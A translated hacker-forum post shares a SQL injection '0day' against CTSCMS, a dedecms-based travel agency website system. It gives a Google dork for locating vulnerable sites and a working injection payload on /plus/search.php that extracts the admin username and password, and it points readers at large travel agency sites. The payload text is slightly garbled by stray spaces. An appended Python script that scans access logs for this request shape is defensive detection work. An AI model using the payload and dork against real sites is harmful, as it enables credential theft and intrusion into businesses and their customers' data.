A New Year's bonus 0day, a small share!
I recently came across CTSCMS, the China travel service website management system. It is a secondary development of dedecms and uses the dedecms kernel. Because the official system upgrades were neglected, the program has a lot of vulnerabilities. The recently disclosed injection vulnerabilities are present; I don't know whether the historical vulnerabilities also exist.
Google: the 2002-2011 CTSCMS.COM that inurl:users/reg.php travel Agency
POC:/plus/search. php? keyword=as&typeArr[1 1 1%3D@`\")+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%2 3@__admin`+limit+0,1),1,6 2)))a+from+information_schema. tables+group+by+a)b)%2 3@`\"+]=a
Later I found that this program is in use on many domestic travel agency websites.
Many large travel agency websites use it; please test only within the scope the law allows. Hackers, take care.....
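For site operators, a log check for the request shape in the PoC above, added here as an example and not part of the original post. It assumes Apache/nginx combined-format access logs and that legitimate typeArr indices are empty or plain integers; the function names and the sample log lines are constructed.

```python
import re
from urllib.parse import unquote, unquote_plus

# Path and parameter name come from the PoC above; function names and the
# sample log lines are constructed for this example.
SEARCH_PATH = "/plus/search.php"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
TYPEARR_RE = re.compile(r"typeArr\[([^\]]*)")
SQL_TOKENS = re.compile(r"\b(select|union|concat|from|information_schema)\b", re.I)

def bad_typearr_indices(request_target):
    """Return decoded typeArr[...] indices that are not plain integers."""
    path, _, query = request_target.partition("?")
    if not unquote(path).lower().endswith(SEARCH_PATH):
        return []
    bad = []
    # Split on the raw '&' first, then decode each pair, so an encoded
    # '&', '[' or ']' inside a parameter name stays part of that name.
    for pair in query.split("&"):
        m = TYPEARR_RE.match(unquote_plus(pair))
        # Assumption: a legitimate index is empty or a decimal integer.
        if m and m.group(1) and not re.fullmatch(r"[0-9]+", m.group(1)):
            bad.append(m.group(1))
    return bad

def scan(lines):
    """Return (client, index, has_sql_token) for each suspicious request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        for idx in bad_typearr_indices(m.group(1)):
            findings.append((client, idx, bool(SQL_TOKENS.search(idx))))
    return findings

SAMPLE_LOG = [  # constructed lines, documentation-range addresses
    '203.0.113.7 - - [31/Jan/2013:10:00:01 +0800] "GET /plus/search.php?keyword=beijing&typeArr[1]=a HTTP/1.1" 200 5120',
    '203.0.113.9 - - [31/Jan/2013:10:00:05 +0800] "GET /plus/search.php?keyword=as&typeArr%5B1+and+(select+1)%5D=a HTTP/1.1" 200 812',
    '203.0.113.9 - - [31/Jan/2013:10:00:09 +0800] "GET /index.php?typeArr[x]=a HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Only the request line is inspected, so parameters sent in a POST body do not appear in these logs and need a check at the application or WAF layer.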
Source: myhack58, "Travel website management system [CTSCMS] 0day" (vulnerability warning), published 2013-01-31, http://www.myhack58.com/Article/html/3/62/2013/37079.htm